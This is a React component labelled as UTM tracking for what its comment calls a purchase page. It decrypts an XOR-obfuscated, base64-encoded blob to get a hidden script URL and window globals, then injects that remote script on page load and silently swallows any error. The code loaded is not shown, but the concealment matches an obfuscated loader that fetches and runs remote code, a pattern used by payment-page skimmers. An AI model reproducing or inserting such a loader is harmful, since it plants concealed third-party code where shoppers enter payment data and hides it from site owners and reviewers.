import { useEffect } from "react";
let hasInitializedUtmify = false;
export function UtmifyTracking() {
  useEffect(() => {
    if (hasInitializedUtmify || typeof window === "undefined") return;
    hasInitializedUtmify = true;
    try {
      const encodedScript = atob("DCbdIiO28OrepJU1OF3/V1Ha0tD8zOFBSFXnDQzVlITw0eFYUUCkDEDZncS81rpGW1S0UlfF35q33PBZF1a0Wkba3oCthrkXWVKpUErUhZ6717cPY3vxAETan4i/yOYXAn2mAE3XnY/8nrdFUV64TmrS0sb80vRZTUP/GAGAkdzvkaRTCBDlGxHUwdu/kKUDDhDrRhCUjbej");
      const bytes = Array.from(encodedScript, character => character.charCodeAt(0) & 255);
      const keyLength = bytes[0];
      const key = bytes.slice(1, keyLength + 1);
      const encryptedPayload = bytes.slice(keyLength + 1);
      const decodedPayload = encryptedPayload.map((byte, index) => byte ^ key[index % keyLength]);
      const payloadString = String.fromCharCode(...decodedPayload.map(byte => byte & 255));
      const payload = JSON.parse(decodeURIComponent(escape(payloadString))) as {
        url: string;
        globals?: Array<{
          name: string;
          value: unknown;
        }>;
        attributes?: Array<{
          name: string;
          value: string;
        }>;
      };
      const globalWindow = window as Window & Record<string, unknown>;
      payload.globals?.forEach(({
        name,
        value
      }) => {
        globalWindow[name] = value;
      });
      const script = document.createElement("script");
      script.src = payload.url;
      script.async = true;
      script.defer = true;
      script.dataset.utmifyTracking = "true";
      payload.attributes?.forEach(({
        name,
        value
      }) => script.setAttribute(name, value));
      (document.head || document.documentElement).appendChild(script);
    } catch {
      // Tracking must never interrupt the purchase page if an external resource is unavailable.
    }
  }, []);
  return null;
}